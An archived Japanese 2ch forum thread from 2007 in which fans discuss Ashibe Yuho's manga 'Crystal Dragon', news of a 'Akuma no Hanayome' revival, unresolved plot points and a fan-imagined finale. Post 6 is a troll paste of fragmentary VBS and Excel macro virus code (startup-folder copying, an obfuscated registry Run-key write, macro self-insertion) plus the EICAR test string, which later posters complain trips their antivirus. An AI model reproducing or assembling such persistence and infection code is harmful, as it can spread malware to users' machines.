5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

あしべゆうほ【クリスタル★ドラゴン】part6

1 :花と名無しさん:2007/01/10(水) 02:08:46 ID:???0
「クリスタル・ドラゴン」月刊ミステリーボニータ連載中
旅の続きを待ちながら、まったりあしべ作品について語り合いましょう

過去スレ・関連スレは>>2-5
(「悪魔の花嫁」専用スレは懐かし漫画板にあります)
>>970を踏んだ人がお引っ越し
荒らしにレス返し禁止

★公式サイト
http://www.air-castle.com/suishoukyu/
★秋田書店あしべゆうほコミックリスト
http://www.akitashoten.co.jp/CGI/search/books_list.cgi?key=sakuhin&isbn=091318&sakuno=1&bunrui=

2 :花と名無しさん:2007/01/10(水) 02:11:04 ID:???0
★関連スレ
悪魔の花嫁 第4話
http://comic7.2ch.net/test/read.cgi/rcomic/1164097448/

★過去スレ
■■■クリスタル・ドラゴン■■■
http://salad.2ch.net/gcomic/kako/963/963147173.html
★☆クリスタル・ドラゴンpart.2☆★
http://comic.2ch.net/test/read.cgi/gcomic/1002782026/
★☆クリスタル・ドラゴンpart.3☆★
http://comic.2ch.net/test/read.cgi/gcomic/1045613559/
★☆クリスタル・ドラゴンpart.4☆★
http://comic6.2ch.net/test/read.cgi/gcomic/1078654886/
あしべゆうほ【クリスタル★ドラゴン】part5
http://comic7.2ch.net/test/read.cgi/gcomic/1117731551/

3 :花と名無しさん:2007/01/10(水) 02:15:32 ID:???0
月刊ミステリーボニータ2007年2月号より

-----------------------------------------------------
緊急発表!
ミステリボニータ誌上で この春、新作で復活!
悪魔[デイモス]の花嫁 作画/あしべゆうほ、原作/池田悦子

運命は「邂逅」。

1975年の登場以来、数多くの読者を虜にしてきた[悪魔の花嫁]。
未完のままになっていたこの名作が、ついに完全な新作として
ミステリーボニータ誌上で今年の春、復活します!
もちろん原作は池田悦子先生、作画はあしべゆうほ先生。
伝説の黄金コンビが今再び、冷徹で美しい悪魔・デイモスを描きます!
各方面で話題騒然のこの新しい[悪魔の花嫁]。
さらに美しく進化したデイモス、美奈子、ヴィーナスたちの登場を、
あとしばらくお待ちください!

「今後毎月、くわしい情報&進行状況をお伝えします!」

4 :花と名無しさん:2007/01/10(水) 07:37:29 ID:???0
1乙ー

5 :花と名無しさん:2007/01/10(水) 08:40:07 ID:???0


6 :花と名無しさん:2007/01/10(水) 16:27:44 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


7 :花と名無しさん:2007/01/10(水) 19:42:06 ID:???0
>>1
スレ立て乙です〜。

8 :花と名無しさん:2007/01/10(水) 23:28:34 ID:???O
>>1
乙!

9 :花と名無しさん:2007/01/11(木) 11:42:41 ID:???O
クリスタル☆ドラゴンの解消されていない点・気になる点等を
思いついたものをとりあえず挙げてみる。(過去スレで既出含む)

・アリアンロッドの真実の名前
・繭の中のバラーの子供の今後
・レギオンの現状&今後
・グリフィスの現状
・グリフィスの持つドワーフが作り上げた剣がどうなるか
・バラーvsアリアンの闘いがあるのか
・アリアンの故郷は再生するのか
・バラーは人間として生き続けられるのか
・水晶宮と水晶竜とドワーフの王、物語の世界の多面的構造の謎
等々

10 :花と名無しさん:2007/01/11(木) 16:20:33 ID:???0
1000 名前:花と名無しさん 投稿日:2007/01/11(木) 15:29:10 ID:???0
1000だったら、クリドラ続行


前スレ1000、こんなマタ〜リスレで1000取れない訳ないだろ!と一応突っ込んでみるw

11 :花と名無しさん:2007/01/11(木) 22:56:44 ID:???0
>1
最高に乙です。

12 :花と名無しさん:2007/01/12(金) 00:07:23 ID:???0
>>1
乙です。
>>9
いくらなんでも、あと30P位では収拾つかないと思われ。(1ヶ月16P×2ヶ月=32P?)
デイモス連載再開というより、単発なんじゃないだろうか?
ここまで待ったのに、無理矢理オチをつけるのだけはやめて頂きたいと切望。
ローマ編のgdgdを出来るものなら、描き直して頂きたいくらいなのに…。

13 :花と名無しさん:2007/01/12(金) 00:45:46 ID:jPjTU4BW0
このページ、ウィルスソフトが反応するんだよ。
2chブラウザじゃ開けないし。

>>6

のせい???

14 :花と名無しさん:2007/01/12(金) 01:18:06 ID:???0
>>13
質問&雑談スレ11のアドバイスほか、わからない場合は
PC初心者板へGO!

http://comic7.2ch.net/test/read.cgi/gcomic/1167124094/11

15 :花と名無しさん:2007/01/13(土) 01:24:07 ID:jegqqjs7O
即死防止

16 :花と名無しさん:2007/01/13(土) 01:53:15 ID:???0
dat落ち帽子ー

17 :花と名無しさん:2007/01/13(土) 13:09:57 ID:???O
回避

18 :花と名無しさん:2007/01/13(土) 19:11:27 ID:???O
いくつまでだっけ?

19 :花と名無しさん:2007/01/13(土) 19:17:45 ID:???0
30じゃないっけ

20 :花と名無しさん:2007/01/14(日) 00:55:07 ID:???0
年齢の話かと一瞬

21 :花と名無しさん:2007/01/14(日) 16:08:00 ID:???O
ガクブル

22 :花と名無しさん:2007/01/14(日) 19:47:54 ID:3zmeHeex0
しばらくここにずっと来れなかったのですが、
あけましておめでとうございます。
ボニータ、立ち読みしてきました。
ソリルとヘンルーダはめでたしめでたし、
アリアンロッドも助かってよかったよかった。
ドワーフの村でお祝い?してもらってました。
ちょっとクリドラもお正月ぽかったです。

23 :ネタバレあり:2007/01/14(日) 20:41:32 ID:???0
>>22
コミックス派注意!






え?アリアンは水晶につかっていた本体と水晶竜の夢の中に
取り込まれていた精神とが融合して、助かったと言えば助かったけど一時的なもの。
ドワーフの村では身体をちょっと暖めていただけで、アランが作ってくれた少しの時間で
これから本格的に何かが起こるって感じで次号でそ?
ソリルとヘンルーダは2人揃ってめでたしには違いないけど。

肝心のバラーとアリアンの対決が描かれなければ
最終回まで気が抜けないなぁ。
グリフィスもどうなったのか放置のまんまだしw

アリアンが二つに分かれて戦っていた流れが何だったのか、
毎号読んでるのにイマイチ理解できませんでした....orz
早くコミクスでまとめて読みたい。

24 :花と名無しさん:2007/01/14(日) 22:22:51 ID:???O
書き込みが少ないのは閉鎖の噂が原因?

25 :花と名無しさん:2007/01/14(日) 22:57:28 ID:???O
クリドラスレは、いつも過疎だけど?
読者は主婦層が多いので、月〜金の方が活発なような気も…。
一応20を超えたから、即死回避もできたかと思われ。(最近の少女板はゆるい)

26 :花と名無しさん:2007/01/16(火) 00:50:37 ID:???0
なんでこんなところにウイルスコード貼るかなあ!!(怒)

27 :花と名無しさん:2007/01/16(火) 03:10:43 ID:???0
>>26
お願い…もう今更なので、早く自力で対策してください。
2chに出回りはじめた貼るのが楽しい粘着さんが1年以上経過しても
新スレが立つと貼りまくってるだけなので。

質問雑談スレよりコピペ↓
--------------------------------------------------------
11 名前:花と名無しさん 投稿日:2006/12/27(水) 03:55:12 ID:???0
ウィルスコードが貼られた場合、
以下のリンク先を参考にして、各自対策して下さい。

前からよくあるvbsウイルスのソースコード
2ちゃんねる専用ブラウザのログ保存フォルダを「除外」
http://ansitu.xrea.jp/guidance/?FAQ2#k863b492 (特に「・参考」部分のリンク先)

シリア語ブラクラ(改行がおかしくなる)
フォント"Estrangelo Edessa"を削除
http://ansitu.xrea.jp/guidance/?cmd=read&page=FAQ2#ybf9eebe

1度設定するだけで、他のスレに書き込まれた同様の文字列にも反応しなくなりますので、
お奨めします。

28 :花と名無しさん:2007/01/16(火) 16:40:27 ID:xwDZNwOo0
「お願い…」さん…。

29 :花と名無しさん:2007/01/16(火) 21:10:22 ID:???0
もう今更

30 :22:2007/01/17(水) 12:08:15 ID:???0
ストリー省略しすぎでごめんなさい。
ほんとにまだまだ気が抜けませんね。
夢見はどこに行ったのでしょうか?


31 :花と名無しさん:2007/01/18(木) 22:39:19 ID:???0
今更な疑問
ラウリン様はドワーフの王なのに
一本でも多すぎる代物を「作るな!」とは命令できんのかな?
物を作らずにおれないドワーフには言えないかw

32 :花と名無しさん:2007/01/24(水) 18:30:45 ID:???0
実際これから連載ど〜なるんだろう・・・


 自分の妄想最終回

ボロいながらも活気のあるグリアナン・クラーナ。
髪を結い上げたヘンルーダの足元にまとわりつく子供達。
洗濯物を取り込み終え、一息つくヘンルーダ。空を見上げ、
「さっさと戻って来なさいよ、アリアン。
そもないと別の魔法使い呼んじゃうわよ」
海にはソリルの乗っているであろう船。
コマの隅にはシルフの影と点描・・・end

 大変失礼いたしました・・・

10 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)